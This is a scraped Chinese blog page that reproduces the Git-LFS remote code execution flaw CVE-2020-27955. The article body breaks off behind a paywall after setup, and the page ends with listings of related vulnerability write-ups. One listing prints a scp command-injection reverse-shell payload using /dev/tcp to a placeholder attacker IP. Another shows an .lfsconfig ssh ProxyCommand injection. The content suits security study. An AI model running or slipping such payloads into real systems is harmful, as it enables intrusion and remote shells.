CVE-2020-27955 Git-LFS远程代码执行漏洞复现

最新推荐文章于 2021-07-10 00:30:06 发布
最新推荐文章于 2021-07-10 00:30:06 发布
阅读量1.3k 收藏 1
点赞数 4
分类专栏: 渗透测试学习 文章标签: 漏洞复现 CVE-2020-27955
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/117772524
版权
本文详细介绍了CVE-2020-27955,这是一个影响Git LFS <= 2.12版本的远程代码执行漏洞。在Windows平台上,当受害者克隆含有恶意文件的Git存储库时,恶意代码会被执行。复现环境中使用的是Windows 7 x64、Git 2.29.2和Git-LFS 2.12。通过构造恶意存储库并命名文件为.git.bat/.git.cmd/.git.vbs/.git.exe,当Windows靶机克隆该存储库时,恶意脚本会自动运行,例如弹出计算器或反弹shell。修复方案是更新Git到高于2.29.2的版本,并更新Git-LFS到高于2.12的版本。
摘要由CSDN通过智能技术生成

0x01 漏洞简介

Git LFS是Github开发的一个Git扩展,用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题,一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本,就会立即执行有效载荷,漏洞编号为CVE-2020-27955。

0x02 影响版本

Git<=2.29.2、Git-LFS<=2.12,一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等

0x03 本次复现环境

  • Windows version:7 x64
  • Git version:2.29.2
  • Git-LFS version:2.12
  • Kali 2021

0x04 漏洞复现

下载并安装≤2.12版本Git-LFS,可通过以下链接安装Windows版Git v2.29.2,Git-LFS版本就是2.12。

https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

首先在Windows靶机上安装 Git 2.29.2
在这里插入图片描述
接着在Gi

最低0.47元/天 解锁文章
夏了茶糜
关注
专栏目录
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1706
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199
m0_48520508的博客
03-02 1400
0x00 简介 nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。 主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。 0x01漏洞概述 在 Nexus Repository Manager OSS
Git-lfs RCE exploit CVE-2020-27955-已在Windows上测试过:git,gh cli,GitHub Desktop,Visual Studio,SourceTree等-Linux开发
05-27
Git-lfs RCE漏洞CVE-2020-27955-在Windows上进行了测试:git,gh cli,GitHub桌面,Visual Studio,SourceTree等。Git-lfs远程代码执行(RCE)漏洞CVE-2020-27955(BAT / powershell版本)易受攻击:git,GitHub CLI(gh),GitHub Desktop,Visual Studio Code,SourceTree,SmartGit,GitKraken等。由Dawid Golunski发现https://legalhackers.com https://exploitbox.io在Windows上进行了测试:git, GitHub CLI(gh),GitHub桌面,Visual Studio Code,SourceTree,SmartGit,GitKraken等。基本上,整个Windows开发者世界;)查看完整的咨询以获取详细信息和补丁信息:h
Git命令执行漏洞
weixin_30414635的博客
08-12 232
Git命令造成的反弹shell 漏洞描述:   Git LFS可以.lfsconfig使用LFS由存储库中的文件配置(部分),并且可以将Git LFS指向ssh://。 [lfs] url = ssh://-oProxyCommand= some-command   当使用这样的.lfsconfig文件克隆存储库时,使用LFS插件的Git将尝试调用ssh以从主机获取...
老铁,这次我把CVE-2020-5902给你讲清楚
一个安全研究员
07-15 3251
本文主要记录在复现分析本漏洞时候遇到的问题及解决思路,希望能够帮到大家
OpenSSH命令注入漏洞CVE-2020-15778)
weixin_41182861的博客
09-25 5135
漏洞简述 OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。 实际环境汇中的利用场景: 对于用户来说,ssh被阻止,但在authorized_keys文件中的命令选项允许使用scp的情况下,可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到ssh的用户密码,但是不允许ssh连接,或者IP连接受限等情况下,可以尝试此漏洞进行利用。 涉及版本:OpenS
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8134
多次跳转导致的ssrf
CVE-2019-5475 nexus操作系统命令注入漏洞复现
m0_48520508的博客
12-24 783
0x00简介 nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。 0x01漏洞概述 Sonatype Nexus Repository Manager
CVE-2020-7143漏洞复现
一个安全研究员
12-27 2245
复现一波
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1639
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
CVE-2020-15778漏洞复现
热门推荐
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
Apache Flink -任意文件写入漏洞CVE-2020-17518)
chaojixiaojingang
01-07 4158
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
Git曝最危险漏洞,允许攻击者远程执行代码
CSDN资讯
06-01 4800
一场由Git引发的漏洞危机,影响到的将是社区上的全体开发者。 5月29日,微软Visual Studio Team Services项目经理Edward Thomson在DevOps博客中提到,Git社区最近发现Git存在的漏洞,允许黑客在用户的系统上远程执行任意代码。 目前,Git和各种提供Git存储库托管服务的公司开发人员已采取相关措施,以修复在Git源代码版本控制软件中的危险漏洞...
SourceTree 免登录
自信的尘埃 www.gocpplua.com
10-28 1181
SourceTree 是 Windows 和Mac OS X 下免费的 Git 和 Hg 客户端,拥有可视化界面,容易上手操作。同时它也是Mercurial和Subversion版本控制系统工具。支持创建、提交、clone、push、pull 和merge等操作。   我从官网上下载了信息的3.0.8版本,注册的时候发现需要进行注册。由于没有账号,于是在Google搜索跳过登陆,但是一直没有成...
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1339
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
YAPI开源接口管理平台远程代码执行漏洞复现
我是小小白的博客
07-09 439
YAPI开源接口管理平台远程代码执行漏洞复现 前言 该漏洞环境为本地搭建,本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任! 漏洞详情 YAPI接口管理平台是国内某旅行网站的开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 该漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,攻击者
Git 好用的客户端 SourceTree破解
心有猛虎细嗅蔷薇
11-16 2341
软件地址 https://pc.qq.com/detail/17/detail_23237.html 安装步骤 1、增加配置文件 文件地址:C:\Users\用户\AppData\Local\Atlassian\SourceTree 新建文件accounts.json 文件内容 [ { "$id": "1", "$type": "SourceTree...
GitLab任意文件读取漏洞复现(CVE-2020-10977)
内心不种满鲜花就会长满杂草
01-15 8594
GitLab GitLab是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目。它拥有与Github类似的功能,能够浏览源代码,管理缺陷和注释。可以管理团队对仓库的访问,它非常易于浏览提交过的版本并提供一个文件历史库。它还提供一个代码片段收集功能可以轻松实现代码复用,便于日后有需要的时候进行查找。 简单来说,GitLab就是一个与github差不多的项目管理和代码托管平台 官网:https://docs.gitlab.c
YApi接口管理平台远程代码执行漏洞复现
qq_43697234的博客
07-10 739
YApi_mock_RCE
SMBv3远程代码执行漏洞CVE-2020-0796防护指南
CVE-2020-0796,也被称为“永恒之黑”或“SMBGhost”,是一个存在于Windows SMBv3服务器和客户端实现中的远程代码执行漏洞。SMB(Server Message Block)是一种协议,用于在Windows网络中实现文件和打印服务的共享。...
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值